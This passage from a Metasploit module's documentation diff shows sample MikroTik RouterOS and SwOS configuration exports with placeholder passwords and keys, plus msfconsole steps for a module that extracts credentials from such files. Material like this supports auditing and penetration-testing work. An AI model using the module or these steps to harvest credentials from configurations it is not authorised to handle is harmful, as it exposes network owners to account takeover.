+      static-sta-private-algo=none static-sta-private-key="" static-transmit-key=key-0 supplicant-identity=MikroTik tls-certificate=\
+      none tls-mode=no-certificates unicast-ciphers=aes-ccm wpa-pre-shared-key="" wpa2-pre-shared-key=""
+  add authentication-types="" disable-pmkid=no eap-methods=passthrough group-ciphers=aes-ccm group-key-update=5m interim-update=0s \
+      management-protection=disabled management-protection-key="" mode=none mschapv2-password="" mschapv2-username="" name=openwifi \
+      radius-called-format=mac:ssid radius-eap-accounting=no radius-mac-accounting=no radius-mac-authentication=no radius-mac-caching=\
+      disabled radius-mac-format=XX:XX:XX:XX:XX:XX radius-mac-mode=as-username static-algo-0=none static-algo-1=none static-algo-2=\
+      none static-algo-3=none static-key-0="" static-key-1="" static-key-2="" static-key-3="" static-sta-private-algo=none \
+      static-sta-private-key="" static-transmit-key=key-0 supplicant-identity=MikroTik tls-certificate=none tls-mode=no-certificates \
+      unicast-ciphers=aes-ccm wpa-pre-shared-key="" wpa2-pre-shared-key=""
+  add authentication-types=wpa-psk disable-pmkid=no eap-methods=passthrough group-ciphers=aes-ccm group-key-update=5m interim-update=\
+      0s management-protection=disabled management-protection-key="" mode=dynamic-keys mschapv2-password="" mschapv2-username="" name=\
+      wpawifi radius-called-format=mac:ssid radius-eap-accounting=no radius-mac-accounting=no radius-mac-authentication=no \
+      radius-mac-caching=disabled radius-mac-format=XX:XX:XX:XX:XX:XX radius-mac-mode=as-username static-algo-0=none static-algo-1=\
+      none static-algo-2=none static-algo-3=none static-key-0="" static-key-1="" static-key-2="" static-key-3="" \
+      static-sta-private-algo=none static-sta-private-key="" static-transmit-key=key-0 supplicant-identity=MikroTik tls-certificate=\
+      none tls-mode=no-certificates unicast-ciphers=aes-ccm wpa-pre-shared-key=presharedkey wpa2-pre-shared-key=""
+  add authentication-types=wpa2-psk disable-pmkid=no eap-methods=passthrough group-ciphers=aes-ccm group-key-update=5m interim-update=\
+      0s management-protection=disabled management-protection-key="" mode=dynamic-keys mschapv2-password="" mschapv2-username="" name=\
+      wpa2wifi radius-called-format=mac:ssid radius-eap-accounting=no radius-mac-accounting=no radius-mac-authentication=no \
+      radius-mac-caching=disabled radius-mac-format=XX:XX:XX:XX:XX:XX radius-mac-mode=as-username static-algo-0=none static-algo-1=\
+      none static-algo-2=none static-algo-3=none static-key-0="" static-key-1="" static-key-2="" static-key-3="" \
+      static-sta-private-algo=none static-sta-private-key="" static-transmit-key=key-0 supplicant-identity=MikroTik tls-certificate=\
+      none tls-mode=no-certificates unicast-ciphers=aes-ccm wpa-pre-shared-key="" wpa2-pre-shared-key=presharedkey
+  add authentication-types=wpa2-eap disable-pmkid=no eap-methods=passthrough group-ciphers=aes-ccm group-key-update=5m interim-update=\
+      0s management-protection=disabled management-protection-key="" mode=dynamic-keys mschapv2-password=password mschapv2-username=\
+      username name=wpaeapwifi radius-called-format=mac:ssid radius-eap-accounting=no radius-mac-accounting=no \
+      radius-mac-authentication=no radius-mac-caching=disabled radius-mac-format=XX:XX:XX:XX:XX:XX radius-mac-mode=as-username \
+      static-algo-0=none static-algo-1=none static-algo-2=none static-algo-3=none static-key-0="" static-key-1="" static-key-2="" \
+      static-key-3="" static-sta-private-algo=none static-sta-private-key="" static-transmit-key=key-0 supplicant-identity=MikroTik \
+      tls-certificate=none tls-mode=no-certificates unicast-ciphers=aes-ccm wpa-pre-shared-key="" wpa2-pre-shared-key=""
+  add authentication-types="" disable-pmkid=no eap-methods=passthrough group-ciphers=aes-ccm group-key-update=5m interim-update=0s \
+      management-protection=disabled management-protection-key="" mode=static-keys-required mschapv2-password="" mschapv2-username="" \
+      name=wepwifi radius-called-format=mac:ssid radius-eap-accounting=no radius-mac-accounting=no radius-mac-authentication=no \
+      radius-mac-caching=disabled radius-mac-format=XX:XX:XX:XX:XX:XX radius-mac-mode=as-username static-algo-0=none static-algo-1=\
+      none static-algo-2=none static-algo-3=none static-key-0=0123456789 static-key-1=0987654321 static-key-2=1234509876 static-key-3=\
+      0192837645 static-sta-private-algo=none static-sta-private-key="" static-transmit-key=key-0 supplicant-identity=MikroTik \
+      tls-certificate=none tls-mode=no-certificates unicast-ciphers=aes-ccm wpa-pre-shared-key="" wpa2-pre-shared-key=""
+  add authentication-types="" disable-pmkid=no eap-methods=passthrough group-ciphers=aes-ccm group-key-update=5m interim-update=0s \
+      management-protection=disabled management-protection-key="" mode=static-keys-required mschapv2-password="" mschapv2-username="" \
+      name=wep1wifi radius-called-format=mac:ssid radius-eap-accounting=no radius-mac-accounting=no radius-mac-authentication=no \
+      radius-mac-caching=disabled radius-mac-format=XX:XX:XX:XX:XX:XX radius-mac-mode=as-username static-algo-0=none static-algo-1=\
+      none static-algo-2=none static-algo-3=none static-key-0=1111111111 static-key-1="" static-key-2="" static-key-3="" \
+      static-sta-private-algo=none static-sta-private-key="" static-transmit-key=key-0 supplicant-identity=MikroTik tls-certificate=\
+      none tls-mode=no-certificates unicast-ciphers=aes-ccm wpa-pre-shared-key="" wpa2-pre-shared-key=""
+  /ip dhcp-client option
+  set clientid_duid code=61 name=clientid_duid value="0xff\$(CLIENT_DUID)"
+  set clientid code=61 name=clientid value="0x01\$(CLIENT_MAC)"
+  set hostname code=12 name=hostname value="\$(HOSTNAME)"
+  /ip hotspot profile
+  set [ find default=yes ] dns-name="" hotspot-address=0.0.0.0 html-directory=hotspot html-directory-override="" http-cookie-lifetime=\
+      3d http-proxy=0.0.0.0:0 login-by=cookie,http-chap name=default rate-limit="" smtp-server=0.0.0.0 split-user-domain=no \
+      use-radius=no
+  /ip hotspot user profile
+  set [ find default=yes ] add-mac-cookie=yes address-list="" idle-timeout=none !insert-queue-before keepalive-timeout=2m \
+      mac-cookie-timeout=3d name=default !parent-queue !queue-type shared-users=1 status-autorefresh=1m transparent-proxy=no
+  /ip ipsec mode-config
+  set [ find default=yes ] name=request-only responder=no
+  /ip ipsec policy group
+  set [ find default=yes ] name=default
+  /ip ipsec profile
+  set [ find default=yes ] dh-group=modp2048,modp1024 dpd-interval=2m dpd-maximum-failures=5 enc-algorithm=aes-128,3des \
+      hash-algorithm=sha1 lifetime=1d name=default nat-traversal=yes proposal-check=obey
+  /ip ipsec proposal
+  set [ find default=yes ] auth-algorithms=sha1 disabled=no enc-algorithms=aes-256-cbc,aes-192-cbc,aes-128-cbc lifetime=30m name=\
+      default pfs-group=modp1024
+  /port
+  set 0 baud-rate=9600 data-bits=8 flow-control=none name=serial0 parity=none stop-bits=1
+  set 1 baud-rate=9600 data-bits=8 flow-control=none name=serial1 parity=none stop-bits=1
+  /ppp profile
+  set *0 address-list="" !bridge !bridge-horizon !bridge-path-cost !bridge-port-priority change-tcp-mss=yes !dns-server !idle-timeout \
+      !incoming-filter !insert-queue-before !interface-list !local-address name=default on-down="" on-up="" only-one=default \
+      !outgoing-filter !parent-queue !queue-type !rate-limit !remote-address !session-timeout use-compression=default use-encryption=\
+      default use-mpls=default use-upnp=default !wins-server
+  add address-list="" bridge=bridge_local !bridge-horizon !bridge-path-cost !bridge-port-priority change-tcp-mss=default !dns-server \
+      !idle-timeout !incoming-filter !insert-queue-before !interface-list !local-address name=ppp_bridge on-down="" on-up="" only-one=\
+      default !outgoing-filter !parent-queue !queue-type !rate-limit !remote-address !session-timeout use-compression=default \
+      use-encryption=yes use-mpls=default use-upnp=default !wins-server
+  set *FFFFFFFE address-list="" !bridge !bridge-horizon !bridge-path-cost !bridge-port-priority change-tcp-mss=yes !dns-server \
+      !idle-timeout !incoming-filter !insert-queue-before !interface-list !local-address name=default-encryption on-down="" on-up="" \
+      only-one=default !outgoing-filter !parent-queue !queue-type !rate-limit !remote-address !session-timeout use-compression=default \
+      use-encryption=yes use-mpls=default use-upnp=default !wins-server
+  /interface ovpn-client
+  add add-default-route=no auth=sha1 certificate=none cipher=blowfish128 connect-to=10.99.99.98 disabled=no mac-address=\
+      FE:45:B0:31:4A:34 max-mtu=1500 mode=ip name=ovpn-out1 password=password port=1194 profile=default user=user \
+      verify-server-certificate=no
+  add add-default-route=no auth=sha1 certificate=none cipher=blowfish128 connect-to=10.99.99.98 disabled=no mac-address=\
+      FE:45:B0:31:4A:34 max-mtu=1500 mode=ip name=ovpn-out2 password=password port=1194 profile=default user=user \
+      verify-server-certificate=no
+  add add-default-route=no auth=sha1 certificate=none cipher=blowfish128 connect-to=10.99.99.98 disabled=yes mac-address=\
+      FE:45:B0:31:4A:34 max-mtu=1500 mode=ip name=ovpn-out3 password=password port=1194 profile=default user=user \
+      verify-server-certificate=no
+  add add-default-route=no auth=sha1 certificate=none cipher=blowfish128 connect-to=10.99.99.98 disabled=no mac-address=\
+      FE:45:B0:31:4A:34 max-mtu=1500 mode=ip name=ovpn-out4 password=password port=1194 profile=default user=user \
+      verify-server-certificate=no
+  /interface pppoe-client
+  # Client is on slave interface
+  add ac-name="" add-default-route=no allow=pap,chap,mschap1,mschap2 dial-on-demand=no disabled=no interface=ether2 keepalive-timeout=\
+      10 max-mru=auto max-mtu=auto mrru=disabled name=pppoe-user password=password profile=default service-name=internet use-peer-dns=\
+      no user=user
+  /interface l2tp-client
+  add add-default-route=no allow=pap,chap,mschap1,mschap2 allow-fast-path=no connect-to=10.99.99.99 dial-on-demand=no disabled=yes \
+      ipsec-secret="" keepalive-timeout=60 max-mru=1450 max-mtu=1450 mrru=disabled name=l2tp-hm password=123 profile=\
+      default-encryption use-ipsec=no user=l2tp-hm
+  /interface pptp-client
+  add add-default-route=no allow=pap,chap,mschap1,mschap2 connect-to=10.99.99.99 dial-on-demand=no disabled=no keepalive-timeout=60 \
+      max-mru=1450 max-mtu=1450 mrru=disabled name=pptp-hm password=123 profile=default-encryption user=pptp-hm
+  /queue interface
+  set l2tp-hm queue=no-queue
+  # Client is on slave interface
+  set pppoe-user queue=no-queue
+  set pptp-hm queue=no-queue
+  /queue type
+  set 0 kind=pfifo name=default pfifo-limit=50
+  set 1 kind=pfifo name=ethernet-default pfifo-limit=50
+  set 2 kind=sfq name=wireless-default sfq-allot=1514 sfq-perturb=5
+  set 3 kind=red name=synchronous-default red-avg-packet=1000 red-burst=20 red-limit=60 red-max-threshold=50 red-min-threshold=10
+  set 4 kind=sfq name=hotspot-default sfq-allot=1514 sfq-perturb=5
+  set 5 kind=pcq name=pcq-upload-default pcq-burst-rate=0 pcq-burst-threshold=0 pcq-burst-time=10s pcq-classifier=src-address \
+      pcq-dst-address-mask=32 pcq-dst-address6-mask=128 pcq-limit=50KiB pcq-rate=0 pcq-src-address-mask=32 pcq-src-address6-mask=128 \
+      pcq-total-limit=2000KiB
+  set 6 kind=pcq name=pcq-download-default pcq-burst-rate=0 pcq-burst-threshold=0 pcq-burst-time=10s pcq-classifier=dst-address \
+      pcq-dst-address-mask=32 pcq-dst-address6-mask=128 pcq-limit=50KiB pcq-rate=0 pcq-src-address-mask=32 pcq-src-address6-mask=128 \
+      pcq-total-limit=2000KiB
+  set 7 kind=none name=only-hardware-queue
+  set 8 kind=mq-pfifo mq-pfifo-limit=50 name=multi-queue-ethernet-default
+  set 9 kind=pfifo name=default-small pfifo-limit=10
+  /queue interface
+  set ether1 queue=only-hardware-queue
+  set ether2 queue=only-hardware-queue
+  set ovpn-out1 queue=only-hardware-queue
+  set ovpn-out2 queue=only-hardware-queue
+  set ovpn-out3 queue=only-hardware-queue
+  set ovpn-out4 queue=only-hardware-queue
+  /routing bgp instance
+  set default as=65530 client-to-client-reflection=yes !cluster-id !confederation disabled=no ignore-as-path-len=no name=default \
+      out-filter="" redistribute-connected=no redistribute-ospf=no redistribute-other-bgp=no redistribute-rip=no redistribute-static=\
+      no router-id=0.0.0.0 routing-table=""
+  /routing ospf instance
+  set [ find default=yes ] disabled=no distribute-default=never !domain-id !domain-tag in-filter=ospf-in metric-bgp=auto \
+      metric-connected=20 metric-default=1 metric-other-ospf=auto metric-rip=20 metric-static=20 !mpls-te-area !mpls-te-router-id \
+      name=default out-filter=ospf-out redistribute-bgp=no redistribute-connected=no redistribute-other-ospf=no redistribute-rip=no \
+      redistribute-static=no router-id=0.0.0.0 !routing-table !use-dn
+  /routing ospf area
+  set [ find default=yes ] area-id=0.0.0.0 disabled=no instance=default name=backbone type=default
+  /snmp community
+  set [ find default=yes ] addresses=::/0 authentication-password="" authentication-protocol=MD5 encryption-password="" \
+      encryption-protocol=DES name=public read-access=yes security=none write-access=no
+  add addresses=::/0 authentication-password=write authentication-protocol=MD5 encryption-password="" encryption-protocol=DES name=\
+      write read-access=yes security=none write-access=yes
+  add addresses=::/0 authentication-password=0123456789 authentication-protocol=SHA1 encryption-password=9876543210 \
+      encryption-protocol=AES name=v3 read-access=yes security=none write-access=no
+  /system logging action
+  set 0 memory-lines=1000 memory-stop-on-full=no name=memory target=memory
+  set 1 disk-file-count=2 disk-file-name=log disk-lines-per-file=1000 disk-stop-on-full=no name=disk target=disk
+  set 2 name=echo remember=yes target=echo
+  set 3 bsd-syslog=no name=remote remote=0.0.0.0 remote-port=514 src-address=0.0.0.0 syslog-facility=daemon syslog-severity=auto \
+      syslog-time-format=bsd-syslog target=remote
+  /user group
+  set read name=read policy=\
+      local,telnet,ssh,reboot,read,test,winbox,password,web,sniff,sensitive,api,romon,tikapp,!ftp,!write,!policy,!dude skin=default
+  set write name=write policy=\
+      local,telnet,ssh,reboot,read,write,test,winbox,password,web,sniff,sensitive,api,romon,tikapp,!ftp,!policy,!dude skin=default
+  set full name=full policy=\
+      local,telnet,ssh,ftp,reboot,read,write,policy,test,winbox,password,web,sniff,sensitive,api,romon,dude,tikapp skin=default
+  /caps-man aaa
+  set called-format=mac:ssid interim-update=disabled mac-caching=disabled mac-format=XX:XX:XX:XX:XX:XX mac-mode=as-username
+  /caps-man manager
+  set ca-certificate=none certificate=none enabled=no package-path="" require-peer-certificate=no upgrade-policy=none
+  /caps-man manager interface
+  set [ find default=yes ] disabled=no forbid=no interface=all
+  /certificate settings
+  set crl-download=yes crl-store=ram crl-use=yes
+  /dude
+  set data-directory=dude enabled=no
+  /interface bridge port
+  add auto-isolate=no bpdu-guard=no bridge=bridge_local broadcast-flood=yes disabled=no edge=auto fast-leave=no frame-types=admit-all \
+      horizon=none hw=yes ingress-filtering=no interface=ether2 internal-path-cost=10 learn=auto multicast-router=temporary-query \
+      path-cost=10 point-to-point=auto priority=0x80 pvid=1 restricted-role=no restricted-tcn=no tag-stacking=no trusted=no \
+      unknown-multicast-flood=yes unknown-unicast-flood=yes
+  /interface bridge settings
+  set allow-fast-path=yes use-ip-firewall=no use-ip-firewall-for-pppoe=no use-ip-firewall-for-vlan=no
+  /ip firewall connection tracking
+  set enabled=auto generic-timeout=10m icmp-timeout=10s loose-tcp-tracking=yes tcp-close-timeout=10s tcp-close-wait-timeout=10s \
+      tcp-established-timeout=1d tcp-fin-wait-timeout=10s tcp-last-ack-timeout=10s tcp-max-retrans-timeout=5m \
+      tcp-syn-received-timeout=5s tcp-syn-sent-timeout=5s tcp-time-wait-timeout=10s tcp-unacked-timeout=5m udp-stream-timeout=3m \
+      udp-timeout=10s
+  /ip neighbor discovery-settings
+  set discover-interface-list=!dynamic
+  /ip settings
+  set accept-redirects=no accept-source-route=no allow-fast-path=yes arp-timeout=30s icmp-rate-limit=10 icmp-rate-mask=0x1818 \
+      ip-forward=yes max-neighbor-entries=8192 route-cache=yes rp-filter=no secure-redirects=yes send-redirects=yes tcp-syncookies=no
+  /interface detect-internet
+  set detect-interface-list=none internet-interface-list=none lan-interface-list=none wan-interface-list=none
+  /interface l2tp-server server
+  set allow-fast-path=no authentication=pap,chap,mschap1,mschap2 caller-id-type=ip-address default-profile=default-encryption enabled=\
+      no ipsec-secret="" keepalive-timeout=30 max-mru=1450 max-mtu=1450 max-sessions=unlimited mrru=disabled one-session-per-host=no \
+      use-ipsec=no
+  /interface ovpn-server server
+  set auth=sha1,md5 cipher=blowfish128,aes128 default-profile=default enabled=no keepalive-timeout=60 mac-address=FE:73:1F:69:35:EC \
+      max-mtu=1500 mode=ip netmask=24 port=1194 require-client-certificate=no
+  /interface pptp-server server
+  set authentication=mschap1,mschap2 default-profile=default-encryption enabled=no keepalive-timeout=30 max-mru=1450 max-mtu=1450 \
+      mrru=disabled
+  /interface sstp-server server
+  set authentication=pap,chap,mschap1,mschap2 certificate=none default-profile=default enabled=no force-aes=no keepalive-timeout=60 \
+      max-mru=1500 max-mtu=1500 mrru=disabled pfs=no port=443 tls-version=any verify-client-certificate=no
+  /interface wireless align
+  set active-mode=yes audio-max=-20 audio-min=-100 audio-monitor=00:00:00:00:00:00 filter-mac=00:00:00:00:00:00 frame-size=300 \
+      frames-per-second=25 receive-all=no ssid-all=no
+  /interface wireless cap
+  set bridge=none caps-man-addresses="" caps-man-certificate-common-names="" caps-man-names="" certificate=none discovery-interfaces=\
+      "" enabled=no interfaces="" lock-to-caps-man=no static-virtual=no
+  /interface wireless sniffer
+  set channel-time=200ms file-limit=10 file-name="" memory-limit=10 multiple-channels=no only-headers=no receive-errors=no \
+      streaming-enabled=no streaming-max-rate=0 streaming-server=0.0.0.0
+  /interface wireless snooper
+  set channel-time=200ms multiple-channels=yes receive-errors=no
+  /ip accounting
+  set account-local-traffic=no enabled=no threshold=256
+  /ip accounting web-access
+  set accessible-via-web=no address=0.0.0.0/0
+  /ip cloud
+  set ddns-enabled=no ddns-update-interval=none update-time=no
+  /ip cloud advanced
+  set use-local-address=no
+  /ip dhcp-client
+  add add-default-route=yes default-route-distance=1 dhcp-options=hostname,clientid disabled=no interface=ether1 use-peer-dns=yes \
+      use-peer-ntp=yes
+  /ip dhcp-server config
+  set accounting=yes interim-update=0s store-leases-disk=5m
+  /ip dns
+  set allow-remote-requests=no cache-max-ttl=1w cache-size=2048KiB max-concurrent-queries=100 max-concurrent-tcp-sessions=20 \
+      max-udp-packet-size=4096 query-server-timeout=2s query-total-timeout=10s servers=""
+  /ip firewall service-port
+  set ftp disabled=no ports=21
+  set tftp disabled=no ports=69
+  set irc disabled=no ports=6667
+  set h323 disabled=no
+  set sip disabled=no ports=5060,5061 sip-direct-media=yes sip-timeout=1h
+  set pptp disabled=no
+  set udplite disabled=no
+  set dccp disabled=no
+  set sctp disabled=no
+  /ip hotspot service-port
+  set ftp disabled=no ports=21
+  /ip hotspot user
+  set [ find default=yes ] comment="counters and limits for trial users" disabled=no name=default-trial
+  /ip ipsec policy
+  set 0 disabled=no dst-address=::/0 group=default proposal=default protocol=all src-address=::/0 template=yes
+  /ip ipsec settings
+  set accounting=yes interim-update=0s xauth-use-radius=no
+  /ip proxy
+  set always-from-cache=no anonymous=no cache-administrator=webmaster cache-hit-dscp=4 cache-on-disk=no cache-path=web-proxy enabled=\
+      no max-cache-object-size=2048KiB max-cache-size=unlimited max-client-connections=600 max-fresh-time=3d max-server-connections=\
+      600 parent-proxy=:: parent-proxy-port=0 port=8080 serialize-connections=no src-address=::
+  /ip service
+  set telnet address="" disabled=no port=23
+  set ftp address="" disabled=no port=21
+  set www address="" disabled=no port=80
+  set ssh address="" disabled=no port=22
+  set www-ssl address="" certificate=none disabled=yes port=443
+  set api address="" disabled=no port=8728
+  set winbox address="" disabled=no port=8291
+  set api-ssl address="" certificate=none disabled=no port=8729
+  /ip smb
+  set allow-guests=yes comment=MikrotikSMB domain=MSHOME enabled=no interfaces=all
+  /ip smb shares
+  set [ find default=yes ] comment="default share" directory=/pub disabled=no max-sessions=10 name=pub
+  /ip smb users
+  set [ find default=yes ] disabled=no name=guest password="" read-only=yes
+  add disabled=no name=mtuser password=mtpasswd read-only=no
+  add disabled=yes name=disableduser password=disabledpasswd read-only=yes
+  /ip socks
+  set connection-idle-timeout=2m enabled=no max-connections=200 port=1080
+  /ip ssh
+  set allow-none-crypto=no always-allow-password-login=no forwarding-enabled=no host-key-size=2048 strong-crypto=no
+  /ip tftp settings
+  set max-block-size=4096
+  /ip traffic-flow
+  set active-flow-timeout=30m cache-entries=16k enabled=no inactive-flow-timeout=15s interfaces=all
+  /ip traffic-flow ipfix
+  set bytes=yes dst-address=yes dst-address-mask=yes dst-mac-address=yes dst-port=yes first-forwarded=yes gateway=yes icmp-code=yes \
+      icmp-type=yes igmp-type=yes in-interface=yes ip-header-length=yes ip-total-length=yes ipv6-flow-label=yes is-multicast=yes \
+      last-forwarded=yes nat-dst-address=yes nat-dst-port=yes nat-src-address=yes nat-src-port=yes out-interface=yes packets=yes \
+      protocol=yes src-address=yes src-address-mask=yes src-mac-address=yes src-port=yes tcp-ack-num=yes tcp-flags=yes tcp-seq-num=yes \
+      tcp-window-size=yes tos=yes ttl=yes udp-length=yes
+  /ip upnp
+  set allow-disable-external-interface=no enabled=no show-dummy-rule=yes
+  /mpls
+  set dynamic-label-range=16-1048575 propagate-ttl=yes
+  /mpls interface
+  set [ find default=yes ] disabled=no interface=all mpls-mtu=1508
+  /mpls ldp
+  set distribute-for-default-route=no enabled=no hop-limit=255 loop-detect=no lsr-id=0.0.0.0 path-vector-limit=255 transport-address=\
+      0.0.0.0 use-explicit-null=no
+  /port firmware
+  set directory=firmware ignore-directip-modem=no
+  /ppp aaa
+  set accounting=yes interim-update=0s use-circuit-id-in-nas-port-id=no use-radius=no
+  /ppp secret
+  add caller-id="" disabled=no limit-bytes-in=0 limit-bytes-out=0 !local-address name=ppp1 password=password profile=ppp_bridge \
+      !remote-address routes="" service=any
+  /radius incoming
+  set accept=no port=3799
+  /routing bfd interface
+  set [ find default=yes ] disabled=no interface=all interval=0.2s min-rx=0.2s multiplier=5
+  /routing mme
+  set bidirectional-timeout=2 gateway-class=none gateway-keepalive=1m gateway-selection=no-gateway origination-interval=5s \
+      preferred-gateway=0.0.0.0 timeout=1m ttl=50
+  /routing rip
+  set distribute-default=never garbage-timer=2m metric-bgp=1 metric-connected=1 metric-default=1 metric-ospf=1 metric-static=1 \
+      redistribute-bgp=no redistribute-connected=no redistribute-ospf=no redistribute-static=no routing-table=main timeout-timer=3m \
+      update-timer=30s
+  /snmp
+  set contact="fake <fake@fake.com>" enabled=no engine-id="" location=nowhere trap-community=public trap-generators=temp-exception \
+      trap-target="" trap-version=1
+  /system clock
+  set time-zone-autodetect=yes time-zone-name=manual
+  /system clock manual
+  set dst-delta=+00:00 dst-end="jan/01/1970 00:00:00" dst-start="jan/01/1970 00:00:00" time-zone=+00:00
+  /system console
+  set [ find port=serial0 ] channel=0 disabled=no port=serial0 term=vt102
+  set [ find vcno=1 ] channel=0 disabled=no term=linux
+  set [ find vcno=2 ] channel=0 disabled=no term=linux
+  set [ find vcno=3 ] channel=0 disabled=no term=linux
+  set [ find vcno=4 ] channel=0 disabled=no term=linux
+  set [ find vcno=5 ] channel=0 disabled=no term=linux
+  set [ find vcno=6 ] channel=0 disabled=no term=linux
+  set [ find vcno=7 ] channel=0 disabled=no term=linux
+  set [ find vcno=8 ] channel=0 disabled=no term=linux
+  /system console screen
+  set blank-interval=10min line-count=25
+  /system hardware
+  set multi-cpu=yes
+  /system health
+  set state-after-reboot=enabled
+  /system identity
+  set name=mikrotik_hostname
+  /system leds settings
+  set all-leds-off=never
+  /system logging
+  set 0 action=memory disabled=no prefix="" topics=info
+  set 1 action=memory disabled=no prefix="" topics=error
+  set 2 action=memory disabled=no prefix="" topics=warning
+  set 3 action=echo disabled=no prefix="" topics=critical
+  /system note
+  set note="" show-at-login=yes
+  /system ntp client
+  set enabled=no primary-ntp=0.0.0.0 secondary-ntp=0.0.0.0 server-dns-names=""
+  /system resource irq
+  set 0 cpu=auto
+  set 1 cpu=auto
+  set 2 cpu=auto
+  set 3 cpu=auto
+  set 4 cpu=auto
+  set 5 cpu=auto
+  set 6 cpu=auto
+  set 7 cpu=auto
+  set 8 cpu=auto
+  set 9 cpu=auto
+  set 10 cpu=auto
+  /system upgrade mirror
+  set check-interval=1d enabled=no primary-server=0.0.0.0 secondary-server=0.0.0.0 user=""
+  /system watchdog
+  set auto-send-supout=no automatic-supout=yes ping-start-after-boot=5m ping-timeout=1m watch-address=none watchdog-timer=yes
+  /tool bandwidth-server
+  set allocate-udp-ports-from=2000 authenticate=yes enabled=yes max-sessions=100
+  /tool e-mail
+  set address=1.1.1.1 from=router@router.com password=smtppassword port=25 start-tls=no user=smtpuser
+  /tool graphing
+  set page-refresh=300 store-every=5min
+  /tool mac-server
+  set allowed-interface-list=all
+  /tool mac-server mac-winbox
+  set allowed-interface-list=all
+  /tool mac-server ping
+  set enabled=yes
+  /tool romon
+  set enabled=no id=00:00:00:00:00:00 secrets=""
+  /tool romon port
+  set [ find default=yes ] cost=100 disabled=no forbid=no interface=all secrets=""
+  /tool sms
+  set allowed-number="" auto-erase=no channel=0 port=none receive-enabled=no secret="" sim-pin=""
+  /tool sniffer
+  set file-limit=1000KiB file-name="" filter-cpu="" filter-direction=any filter-interface="" filter-ip-address="" filter-ip-protocol=\
+      "" filter-ipv6-address="" filter-mac-address="" filter-mac-protocol="" filter-operator-between-entries=or filter-port="" \
+      filter-stream=no memory-limit=100KiB memory-scroll=yes only-headers=no streaming-enabled=no streaming-server=0.0.0.0
+  /tool traffic-generator
+  set latency-distribution-max=100us measure-out-of-order=yes stats-samples-to-keep=100 test-id=0
+  /user aaa
+  set accounting=yes default-group=read exclude-groups="" interim-update=0s use-radius=no
+  ```
+
+### SwOS
+
+  ```
+  vlan.b:[],lacp.b:{mode:[0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00],sgrp:[0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00]},host.b:[],acl.b:[],snmp.b:{en:0x01,com:'7075626c6963',ci:'636f6e74616374696e666f',loc:'6c6f636174696f6e'},rstp.b:{ena:0x03ffffff},fwd.b:{fp1:0x03fffffe,fp2:0x03fffffd,fp3:0x03fffffb,fp4:0x03fffff7,fp5:0x03ffffef,fp6:0x03ffffdf,fp7:0x03ffffbf,fp8:0x03ffff7f,fp9:0x03fffeff,fp10:0x03fffdff,fp11:0x03fffbff,fp12:0x03fff7ff,fp13:0x03ffefff,fp14:0x03ffdfff,fp15:0x03ffbfff,fp16:0x03ff7fff,fp17:0x03feffff,fp18:0x03fdffff,fp19:0x03fbffff,fp20:0x03f7ffff,fp21:0x03efffff,fp22:0x03dfffff,fp23:0x03bfffff,fp24:0x037fffff,fp25:0x02ffffff,fp26:0x01ffffff,lck:0x00,lckf:0x00,imr:0x00,omr:0x00,mrto:0x01,vlan:[0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01],vlni:[0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00],dvid:[0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01,0x01],fvid:0x00,srt:[0x64,0x64,0x64,0x64,0x64,0x64,0x64,0x64,0x64,0x64,0x64,0x64,0x64,0x64,0x64,0x64,0x64,0x64,0x64,0x64,0x64,0x64,0x64,0x64,0x64,0x64],suni:0x00,fmc:0x03ffffff,ir:[0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00]},link.b:{en:0x03ffffff,blkp:0x00,an:0x03ffffff,dpxc:0x03ffffff,fctc:0x03ffffff,fctr:0x00,spdc:[0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00],cm:[0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00],qtyp:[0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00],nm:['506f727431','506f727432','506f727433','506f727434','506f727435','506f727436','506f727437','506f727438','506f727439','506f72743130','506f72743131','506f72743132','506f72743133','506f72743134','506f72743135','506f72743136','506f72743137','506f72743138','506f72743139','506f72743230','506f72743231','506f72743232','506f72743233','75706c696e6b','53465031','53465032']},sys.b:{id:'4d696b726f54696b2d637373333236',wdt:0x01,dsc:0x01,ivl:0x00,alla:0x00,allm:0x00,allp:0x03ffffff,avln:0x00,prio:0x8000,cost:0x00,igmp:0x00,ip:0x0158a8c0,iptp:0x02,dtrp:0x03ffffff,ainf:0x01,poe:0x00},.pwd.b:{pwd:'61646d696e'}
+  ```
+
+
+## Verification Steps
+
+1. Have a Mikrotik configuration file
+2. Start `msfconsole`
+3. `use auxiliary/admin/networking/mikrotik_config`
+4. `set RHOST x.x.x.x`
+5. `set CONFIG /tmp/file.config`
+6. `run`
+
+## Options
+
+### RHOST
+
+Needed for setting services and items to.  This is relatively arbitrary.
+
+### CONFIG
+
+File path to the configuration file.
+
+### ACTION
+
+`ROUTEROS` for RouterOS config file, and `SWOS` for SwitchOS config file (usually SWB file extension). Default is `ROUTEROS`
+
+
+## Scenarios
+
+### RouterOS 6.45.9 /export verbose
+
+```
